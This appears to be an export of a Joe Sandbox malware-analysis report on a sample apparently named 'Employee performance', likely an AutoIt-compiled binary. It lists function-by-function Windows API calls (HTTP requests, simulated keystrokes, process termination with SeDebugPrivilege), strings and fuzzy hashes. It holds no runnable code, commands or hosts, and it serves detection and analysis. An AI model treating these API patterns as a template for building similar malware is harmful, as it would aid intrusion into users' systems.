Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 2cd4508b1b4f43b1a04efce96fd2e8cd860d7da88741543a6f84e3e57df22335
Instruction ID: 488dbfe35c086e19e2f0d7c94c0fd133af2cf962acb7cc4183f90513b992caa6
Opcode Fuzzy Hash: 2cd4508b1b4f43b1a04efce96fd2e8cd860d7da88741543a6f84e3e57df22335
Instruction Fuzzy Hash: 0D51A27280021ABBDF15EBE0CD81EEDBB7ABF14300F484126F14576251DB751A98EF61

Function 01068B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

Part of subcall function 00FE912D: GetCursorPos.USER32(?), ref: 00FE9141
Part of subcall function 00FE912D: ScreenToClient.USER32(00000000,?), ref: 00FE915E
Part of subcall function 00FE912D: GetAsyncKeyState.USER32(00000001), ref: 00FE9183
Part of subcall function 00FE912D: GetAsyncKeyState.USER32(00000002), ref: 00FE919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 01068B6B
ImageList_EndDrag.COMCTL32 ref: 01068B71
ReleaseCapture.USER32 ref: 01068B77
SetWindowTextW.USER32(?,00000000), ref: 01068C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 01068C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 01068CFF

Strings

@GUI_DROPID, xrefs: 01068C51
@GUI_DRAGFILE, xrefs: 01068C9A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 027f1a0fd1e7a3dc4487f64a9ef81fd2e58e6ae6876b6e280471e82a5aec113b
Instruction ID: d0f109d127d5755c4ca24b20f1aa2c1185bd071aa4c07e5e012a20c16ed3b856
Opcode Fuzzy Hash: 027f1a0fd1e7a3dc4487f64a9ef81fd2e58e6ae6876b6e280471e82a5aec113b
Instruction Fuzzy Hash: 4951AB71208304AFE710DF64DC59FAA77E9FB88714F40062EF9D6972A1CB799904CB62

Function 0104C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0104C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0104C2CA
GetLastError.KERNEL32 ref: 0104C322
SetEvent.KERNEL32(?), ref: 0104C336
InternetCloseHandle.WININET(00000000), ref: 0104C341

Strings

, xrefs: 0104C2BB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 7a7dc09a089ac3c8bd2660e1c96d0a3f78e68be3e3c750da4e8c5038aa4d45d1
Instruction ID: 28d8cdb07ef70945c986e1488bf6a296edbc66dfca4314240e920f69311193f9
Opcode Fuzzy Hash: 7a7dc09a089ac3c8bd2660e1c96d0a3f78e68be3e3c750da4e8c5038aa4d45d1
Instruction Fuzzy Hash: 073171B1601244AFF7319FA58AC4AAF7BFCEF49645B04856DE4C6D2210DB39DA048B60

Function 0103989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,01013AAF,?,?,Bad directive syntax error,0106CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 010398BC
LoadStringW.USER32(00000000,?,01013AAF,?), ref: 010398C3

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 01039987

Strings

., xrefs: 0103996D
%s (%d) : ==> %s.: %s %s, xrefs: 010398F1
Line %d (File "%s"):, xrefs: 0103992D
Line %d:, xrefs: 01039912
Error: , xrefs: 01039955

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: d900e94fe707eff630bf387001ad72b8240154ff68150ddb63832ab17e6b0bca
Instruction ID: 6345a1127c76205edf7a9b9056ac330a0d1a70d8ceb908ea840c01dc811b9459
Opcode Fuzzy Hash: d900e94fe707eff630bf387001ad72b8240154ff68150ddb63832ab17e6b0bca
Instruction Fuzzy Hash: 1921D03190021EEBDF11AF90CC06EEE377ABF18304F08441AF65566061EB7A9A28EB11

Function 0103209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 010320AB
GetClassNameW.USER32(00000000,?,00000100), ref: 010320C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0103214D

Strings

smallicons, xrefs: 01032115
SHELLDLL_DefView, xrefs: 010320CC
largeicons, xrefs: 010320E1
details, xrefs: 010320FB
list, xrefs: 0103212F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 7e9b1bf0809f86d16e1aa8952e7e469cd16d04b7753fbeafb2a7c7083ee340ce
Instruction ID: 21f54509c4581e72a8296e8d99d2ee75b73ecf682fa9df996834551f5e637591
Opcode Fuzzy Hash: 7e9b1bf0809f86d16e1aa8952e7e469cd16d04b7753fbeafb2a7c7083ee340ce
Instruction Fuzzy Hash: 7B110A7A68830AB9FB122526DD16DBB379CCF55724B20015AF784A90A2FAB978016A14

Function 0100CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0100CEB7
_free.LIBCMT ref: 0100CF22
_free.LIBCMT ref: 0100CF48
_free.LIBCMT ref: 0100CF71
_free.LIBCMT ref: 0100CFA9
_free.LIBCMT ref: 0100CFDA
_free.LIBCMT ref: 0100D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0100D09C
_free.LIBCMT ref: 0100D0B5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 05586845760c454ac1761b105a432bbb401ed6cf70a99a83f2756580ce4cded8
Instruction ID: 58456d234c6cb2d02f96d3b9b5e715a7124b16f558e63c8d123ff1a35081b8e2
Opcode Fuzzy Hash: 05586845760c454ac1761b105a432bbb401ed6cf70a99a83f2756580ce4cded8
Instruction Fuzzy Hash: B2614972904205AFFB23AFB89984ABD7FE4AF01350F0442EDFAC4972C5D736990587A1

Function 010650D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01065186
ShowWindow.USER32(?,00000000), ref: 010651C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 010651CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 010651D1

Part of subcall function 01066FBA: DeleteObject.GDI32(00000000), ref: 01066FE6

GetWindowLongW.USER32(?,000000F0), ref: 0106520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0106521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0106524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01065287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01065296

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 45c56fef8ada4fe8d6e18c3aa9064f3e62c7848ca151203b3cd41da7666c3deb
Instruction ID: ac35a38895cde480c7e852350b133ef4f124679a7804b3221cfab87a067b3902
Opcode Fuzzy Hash: 45c56fef8ada4fe8d6e18c3aa9064f3e62c7848ca151203b3cd41da7666c3deb
Instruction Fuzzy Hash: 4F51C470A4020AFFFF309F28CC45BD83BA9FB463A1F144152F6959A2E0D3B9A590DB51

Function 00FE8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 01026890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 010268A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 010268B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 010268D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 010268F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FE8874,00000000,00000000,00000000,000000FF,00000000), ref: 01026901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0102691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FE8874,00000000,00000000,00000000,000000FF,00000000), ref: 0102692D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f1a154aeba12fb1890d103ae59a0cf0d6988fdb1b93ff57a202a72aaa18c3d69
Instruction ID: c9f8aa5137c2875dffb99097cafd85f3a852c5e8b6d8851880593741f11f4258
Opcode Fuzzy Hash: f1a154aeba12fb1890d103ae59a0cf0d6988fdb1b93ff57a202a72aaa18c3d69
Instruction Fuzzy Hash: 0651AE70600645EFEB20DF25CC41FAA7BF5FB88350F104618F996972A0DBB6E991EB50

Function 0104C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0104C182
GetLastError.KERNEL32 ref: 0104C195
SetEvent.KERNEL32(?), ref: 0104C1A9

Part of subcall function 0104C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104C272
Part of subcall function 0104C253: GetLastError.KERNEL32 ref: 0104C322
Part of subcall function 0104C253: SetEvent.KERNEL32(?), ref: 0104C336
Part of subcall function 0104C253: InternetCloseHandle.WININET(00000000), ref: 0104C341

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: ffbe7c3b0d012973f3a46a118fa097a6e715a8e199554fe7851939e05949692c
Instruction ID: 5ea08834ba652fd1c64b1b9c14f067cdd0380a099a3e12143f21e4c0e5511c3b
Opcode Fuzzy Hash: ffbe7c3b0d012973f3a46a118fa097a6e715a8e199554fe7851939e05949692c
Instruction Fuzzy Hash: 663183B1502641BFFB219FB5DB84A6A7BF8FF14200B04442DF9DA82624D775E4149B60

Function 010325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 01033A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01033A57
Part of subcall function 01033A3D: GetCurrentThreadId.KERNEL32 ref: 01033A5E
Part of subcall function 01033A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010325B3), ref: 01033A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 010325BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010325DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 010325DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 010325E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01032601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01032605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0103260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01032623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01032627

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e3fe75068930df16e1f5a3bf67cecf61145b31438d232c42754c469bb12ebf41
Instruction ID: a922baef9f9ff51c80b84c6404d31512fd2013c71746be5143616ed0767c744a
Opcode Fuzzy Hash: e3fe75068930df16e1f5a3bf67cecf61145b31438d232c42754c469bb12ebf41
Instruction Fuzzy Hash: 8401D830790610BBFB2076689C8AF593F5DDF8EB11F100001F394AE0D4C9F224458B69

Function 01031803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01031449,?,?,00000000), ref: 0103180C
HeapAlloc.KERNEL32(00000000,?,01031449,?,?,00000000), ref: 01031813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01031449,?,?,00000000), ref: 01031828
GetCurrentProcess.KERNEL32(?,00000000,?,01031449,?,?,00000000), ref: 01031830
DuplicateHandle.KERNEL32(00000000,?,01031449,?,?,00000000), ref: 01031833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01031449,?,?,00000000), ref: 01031843
GetCurrentProcess.KERNEL32(01031449,00000000,?,01031449,?,?,00000000), ref: 0103184B
DuplicateHandle.KERNEL32(00000000,?,01031449,?,?,00000000), ref: 0103184E
CreateThread.KERNEL32(00000000,00000000,01031874,00000000,00000000,00000000), ref: 01031868

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: f05c1ab3934ec78a07636650c0765e73c4546375e0666cae92870035b328b0db
Instruction ID: da59f13c231daa53d467d9427a1e4ad1374f97c6c3c58e86aeb843908d71d8d0
Opcode Fuzzy Hash: f05c1ab3934ec78a07636650c0765e73c4546375e0666cae92870035b328b0db
Instruction Fuzzy Hash: 8001A8B5240348FFF620ABA5DD49F6B3BACEB8AB11F004411FA85DB1A5CA7598008B20

Function 0105A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0103D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0103D501
Part of subcall function 0103D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0103D50F
Part of subcall function 0103D4DC: CloseHandle.KERNEL32(00000000), ref: 0103D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105A16D
GetLastError.KERNEL32 ref: 0105A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0105A268
GetLastError.KERNEL32(00000000), ref: 0105A273
CloseHandle.KERNEL32(00000000), ref: 0105A2C4

Strings

SeDebugPrivilege, xrefs: 0105A18F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 779dc2add59615fb39076b2afe229bce6a0e18df3419f52d1c4df6010c39de8a
Instruction ID: 778f9c987f13c35cea4a2278e8a5a057e3e7a7d90d40510e123a6f882fc919a7
Opcode Fuzzy Hash: 779dc2add59615fb39076b2afe229bce6a0e18df3419f52d1c4df6010c39de8a
Instruction Fuzzy Hash: A961B130204242DFE760DF18C495F5ABBE1AF44358F18858CE9968F7A3C776E945CB91

Function 01063886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01063925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0106393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01063954
_wcslen.LIBCMT ref: 01063999
SendMessageW.USER32(?,00001057,00000000,?), ref: 010639C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 010639F4

Strings

SysListView32, xrefs: 010638F7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 2c4c18d4858603874de5404b69870de033aad146bbdb60bd97c31a8a31c39d68
Instruction ID: 7ab82b93cc7e284cbdcdf5a8c3f74da0305a57b280f274b1d05bcfef347be60f
Opcode Fuzzy Hash: 2c4c18d4858603874de5404b69870de033aad146bbdb60bd97c31a8a31c39d68
Instruction Fuzzy Hash: B5418271A00319ABEF219F64CC45FEA7BADFF08350F10056AF998EB291D7759980CB90

Function 0103BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0103BCFD
IsMenu.USER32(00000000), ref: 0103BD1D
CreatePopupMenu.USER32 ref: 0103BD53
GetMenuItemCount.USER32(01654DD8), ref: 0103BDA4
InsertMenuItemW.USER32(01654DD8,?,00000001,00000030), ref: 0103BDCC

Strings

2, xrefs: 0103BD37
0, xrefs: 0103BCA8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: ad3b182be783f6f02e0d0de015f5bb7be362fd56707670eb68e1b3b37f370b4d
Instruction ID: 621e5d99bd9eea538b941377ad26c45b01d1b7b09b54f9a86efebc18ca4d2e46
Opcode Fuzzy Hash: ad3b182be783f6f02e0d0de015f5bb7be362fd56707670eb68e1b3b37f370b4d
Instruction Fuzzy Hash: B551B270A002099BEF21EFACD988BADBFFCBF85318F144199E581DB291E7709541CB52

Function 0103C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0103C913

Strings

blank, xrefs: 0103C895
warning, xrefs: 0103C8FC
question, xrefs: 0103C8CC
stop, xrefs: 0103C8E4
info, xrefs: 0103C8B4

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 00caf5ffd17d8e8e0a75de1baeea8e4e8e40bd548610bb3890630716c461cd9a
Instruction ID: 470ae78f8959afaea8e1818a7093fdecc666b8fd75ee9272e6f8c4ca1babfc9d
Opcode Fuzzy Hash: 00caf5ffd17d8e8e0a75de1baeea8e4e8e40bd548610bb3890630716c461cd9a
Instruction Fuzzy Hash: 3911EB3668930BBAFB019B559D86CAF77DCDF45360B1100AFF580FA182E7A96F006264

Function 0103ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0103ED2A
_wcslen.LIBCMT ref: 0103ED3B
_wcslen.LIBCMT ref: 0103ED79
_wcslen.LIBCMT ref: 0103EDAF
_wcslen.LIBCMT ref: 0103EDDF
_wcslen.LIBCMT ref: 0103EDEF
_wcslen.LIBCMT ref: 0103EE2B
_wcslen.LIBCMT ref: 0103EE5A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

